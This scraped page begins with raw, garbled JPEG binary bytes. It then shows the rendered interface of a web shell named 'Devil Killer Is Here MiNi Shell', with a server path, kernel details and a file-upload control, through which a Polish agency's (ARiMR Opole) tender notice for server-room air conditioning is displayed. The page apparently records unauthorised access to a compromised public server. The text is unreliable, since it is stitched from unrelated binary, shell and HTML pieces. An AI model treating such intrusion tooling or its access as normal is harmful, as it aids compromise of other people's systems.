JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250905/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250905/0041014201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż wraz z uruchomieniem klimatyzacji precyzyjnej w siedzibie Opolskiego Oddziału Regionalnego ARiMR oraz demontaż wraz z utylizacją klimatyzacji precyzyjnej marki Emerson </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">AGENCJA RESTRUKTURYZACJI I MODERNIZACJI ROLNICTWA OPOLSKI ODDZIAŁ REGIONALNY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Opolski Oddział Regionalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01061308300036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wrocławska 170 G</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-836</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">opolski@arimr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arimr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Agencja płatnicza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż wraz z uruchomieniem klimatyzacji precyzyjnej w siedzibie Opolskiego Oddziału Regionalnego ARiMR oraz demontaż wraz z utylizacją klimatyzacji precyzyjnej marki Emerson </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7b10e639-32dc-4650-bfce-5b22f3ac58cc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00410142</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00060050/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup klimatyzacji precyzyjnej do serwerowni siedziby Opolskiego Oddziału Regionalnego ARiMR</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/arimr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z art. 67 ustawy Prawo zamówień publicznych informuje, że komunikacja pomiędzy Zamawiającym a Wykonawcami odbywać się będzie za pośrednictwem Platformy Zakupowej dostępnej na stronie internetowej https://platformazakupowa.pl/pn/arimr. Ponadto Zamawiający udostępnia informacje dotyczące formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych umożliwiających pracę na Platformie Zakupowej, tj.:<br/>1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s.<br/>2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje.<br/>3. Zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie wersja 10.0.<br/>4. Włączona obsługa JavaScript.<br/>5. Zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików PDF.<br/>6. Platforma Zakupowa działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8.<br/>Wymagania techniczne i organizacyjne korespondencji elektronicznej zostały szczegółowo określone w Specyfikacji Warunków<br/>Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO (obowiązku informacyjnego) zostały przedstawione w Specyfikacji Warunków Zamówienia, która wraz z załącznikami jest dostępna na stronie internetowej prowadzonego postępowania pod adresem: https://platformazakupowa.pl/pn/arimr</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOR08.2619.10.2025.DP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest dostawa i montaż wraz z uruchomieniem klimatyzacji precyzyjnej (komplet dwóch urządzeń) wraz z modułem sterującym w pomieszczeniu serwerowni w siedzibie Opolskiego Oddziału Regionalnego ARiMR w Opolu (45-836), przy ul. Wrocławskiej 170 „G” oraz demontaż wraz z utylizacją klimatyzacji precyzyjnej marki Emerson z modułem sterującym i istniejącymi elementami. Zamawiający wymaga, aby wykonanie przedmiotu zamówienia nastąpiło na warunkach i zasadach określonych w projektowanych postanowieniach umowy wraz z załącznikami, stanowiących Załącznik nr 8 do SWZ. Szczegółowy opis przedmiotu zamówienia oraz minimalne parametry techniczne fabrycznie nowej klimatyzacji określone zostały w treści Załącznika nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39717200-3 - Urządzenia klimatyzacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <p class="mb-0">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów (P), przyznaną zgodnie ze wzorem: P = C + T + W gdzie:<br/>P – łączna liczba punktów ocenianej oferty ocenianej oferty (ocena końcowa)<br/>C – liczba punktów za łączną cenę ofertową (łączną wartość brutto)<br/>T – liczba punktów przyznana w kryterium termin realizacji zamówienia<br/>W – liczba punktów przyznana w kryterium wydajność - jawna moc chłodnicza jednego urządzenia (jednostki wewnętrznej).<br/><br/>W kryterium łączna cena ofertowa brutto dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru:<br/>C = Najniższa cena oferty brutto zaproponowana przez Wykonawców / Cena brutto oferty badanej x 60;<br/>W kryterium „Termin realizacji zamówienia - T” najwyższą liczbę punktów uzyska oferta z najkrótszym zaoferowanym terminem realizacji zamówienia. Ocena punktowa w kryterium termin realizacji zamówienia przeliczona zostanie według wzoru:<br/>T = Najkrótszy termin realizacji zamówienia zaproponowany przez Wykonawców / Termin realizacji zamówienia badanej oferty x 20;<br/>W kryterium „Wydajność- jawna moc chłodnicza jednego urządzenia (jednostki wewnętrznej) – W” najwyższą liczbę punktów uzyska oferta z najwyższą jawną mocą chłodniczą jednego urządzenia tj. jednostki wewnętrznej. <br/>Ocena punktowa w kryterium wydajność jawna moc chłodnicza jednego urządzenia (jednostki wewnętrznej) przeliczona zostanie według wzoru:<br/>W = [ Jawna moc chłodnicza kW jednego urządzenia tj. jednostki wewnętrznej badanej oferty ] / [ Najwyższa jawna moc chłodnicza kW jednego urządzenia tj. jednostki wewnętrznej zaoferowana przez Wykonawców ] x 20</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia – T</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydajność- jawna moc chłodnicza jednego urządzenia (jednostki wewnętrznej) – W</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O niniejsze zamówienie mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu w zakresie:<br/>Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu we wskazanym zakresie, jeżeli wykaże, że posiada certyfikat dla przedsiębiorcy, o którym mowa w art. 29 ust. 2 ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych (Dz. U. z 2020 r. poz. 2065), uprawniający do wykonywania działalności w zakresie instalowania, konserwacji lub serwisowania urządzeń zawierających fluorowane gazy cieplarniane.<br/>Uwagi:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten zostanie uznany za spełniony,<br/>jeżeli minimum jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymagane uprawnienia i<br/>zrealizuje czynności do których są one wymagane. W takiej sytuacji Wykonawca składa wraz z ofertą oświadczenie w<br/>zakresie wskazania, czynności które wykonają poszczególni Wykonawcy (członkowie konsorcjum), którego wzór stanowi<br/>Załącznik nr 6 do SWZ. Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu we wskazanym zakresie, jeżeli Wykonawca/ Podwykonawca wykaże, że posiada odpowiednie ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, obejmujące szkody mogące powstać w związku z realizacją przedmiotu zamówienia, w tym szkody wyrządzone Zamawiającemu lub osobom trzecim, na sumę gwarancyjną nie mniejszą niż 1 000 000,00 PLN (słownie: Jeden milion złotych 00/100), dla jednego i wszystkich zdarzeń objętych ochroną ubezpieczeniową łącznie w<br/>okresie obowiązywania polisy.<br/>Uwagi:<br/>1) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek zostanie spełniony w<br/>przypadku, gdy co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże, że spełnia<br/>warunek w powyższym zakresie;<br/>2) w przypadku gdy suma ubezpieczenia zostanie wyrażona w obcej walucie, Zamawiający do określenia jej wartości w<br/>złotych polskich przyjmie średni kurs NBP obowiązujący w dniu wydania dokumentu przez ubezpieczyciela;<br/>3) warunek udziału dot. wykazania posiadania przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej określoną przez<br/>Zamawiającego zostanie uznany za spełniony, jedynie w przypadku przedłożenia przez Wykonawcę Zamawiającemu polisy<br/>OC lub innego dokumentu potwierdzającego posiadanie ubezpieczenia opłaconego przed upływem terminu składania ofert.<br/>(Pod pojęciem „inny dokument” należy rozumieć inny niż polisa dokument potwierdzający zawarcie umowy ubezpieczenia, który poświadcza obligatoryjne elementy umowy ubezpieczenia. Z treści tego dokumentu lub z załączonego do niego dodatkowego dokumentu powinien wynikać fakt opłacenia przez Wykonawcę składki na ubezpieczenie zgodnie z treścią tej<br/>umowy, nie później niż do upływu terminu składania ofert).<br/>Zdolności technicznej lub zawodowej.<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu we wskazanym zakresie, jeżeli:<br/>a) Wykonawca wykaże, że należycie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 (jedną) dostawę (tj. zrealizował co najmniej jedną umowę obejmującą dostawę fabrycznie nowego systemu klimatyzacji precyzyjnej wraz montażem, uruchomieniem i świadczeniem usług przeglądów okresowych oraz<br/>demontaż wraz z utylizacją systemu klimatyzacji precyzyjnej), porównywalną do przedmiotu zamówienia o wartości nie mniejszej niż 150 000,00 zł brutto oraz załączy dowody potwierdzające, że dostawa została wykonana lub jest wykonywana należycie.<br/>Zamawiający poprzez użyte powyżej sformułowanie „porównywalną do przedmiotu zamówienia” w odniesieniu do należycie wykonanej dostawy rozumie dostawę fabrycznie nowego systemu klimatyzacji precyzyjnej o takim samym stopniu trudności wykonania wraz montażem, uruchomieniem i świadczeniem usług przeglądów okresowych oraz demontażem wraz z<br/>utylizacją systemu klimatyzacji precyzyjnej.<br/>b) Wykonawca oraz Podwykonawca wykaże, że dysponuje osobami, które skierowane zostaną do realizacji<br/>przedmiotowego zamówienia, posiadającymi wymagane prawem niezbędne uprawnienia i kwalifikacje [w tym certyfikat<br/>personalny o którym mowa w art. 20 ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o<br/>niektórych fluorowanych gazach cieplarnianych (Dz. U. z 2020 r. poz. 2065) uprawniający do pracy z urządzeniami<br/>zawierającymi fluorowane gazy cieplarniane].<br/>Warunki udziału w postępowaniu/ informacje dodatkowe:<br/>Zamawiający działając na podstawie art. 131 ust. 2 pkt 1) ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz.U. z 2024 r. poz. 1320, z 2025 r. poz. 620 ze zm.), dopuszcza możliwość odbycia przez Wykonawcę wizji lokalnej, obejmującej inspekcję terenu realizacji zamówienia oraz jego otoczenia. Szczegóły dotyczące m.in. ustalenia terminu odbycia wizji lokalnej, zostały określone w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga:<br/>informacji z Krajowego Rejestru Karnego w zakresie:<br/>a) art. 108 ust. 1 pkt 1) i 2) ustawy Pzp<br/>b) art. 108 ust. 1 pkt 4) ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>c) art. 109 ust. 1 pkt 2) lit. a) ustawy Pzp,<br/>d) art. 109 ust. 1 pkt 2) lit. b) ustawy Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu,<br/>e) art. 109 ust. 1 pkt 3) ustawy Pzp, dotyczącej skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzono karę<br/>aresztu<br/>- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp - sporządzonych nie wcześniej niż 3 miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Oświadczenia Wykonawcy sporządzonego zgodnie z treścią Załącznika nr 13 o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3) ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 4) ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5) ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6) ustawy Pzp,<br/>e) art. 109 ust. 1 pkt 1) ustawy Pzp odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tj. Dz. U. z 2025 poz. 707),<br/>f) art. 109 ust. 1 pkt 2) lit. a) ustawy Pzp,<br/>g) art. 109 ust. 1 pkt 2) lit. b) ustawy Pzp,<br/>h) art. 109 ust. 1 pkt 2) lit. c) ustawy Pzp,<br/>i) art. 109 ust. 1 pkt 3) ustawy Pzp dotyczący ukarania za wykroczenie, za które wymierzono karę ograniczenia wolności lub karę grzywny,<br/>j) art. 109 ust. 1 pkt 4) -10) ustawy Pzp,<br/>k) art. 7 ust. 1 pkt 1), 2), 3) ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025 r. poz. 514);<br/>oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616, z 2025 r. poz. 794) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>Zamawiający wymaga:<br/>Wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>dostawy zostały wykonane lub są wykonywane 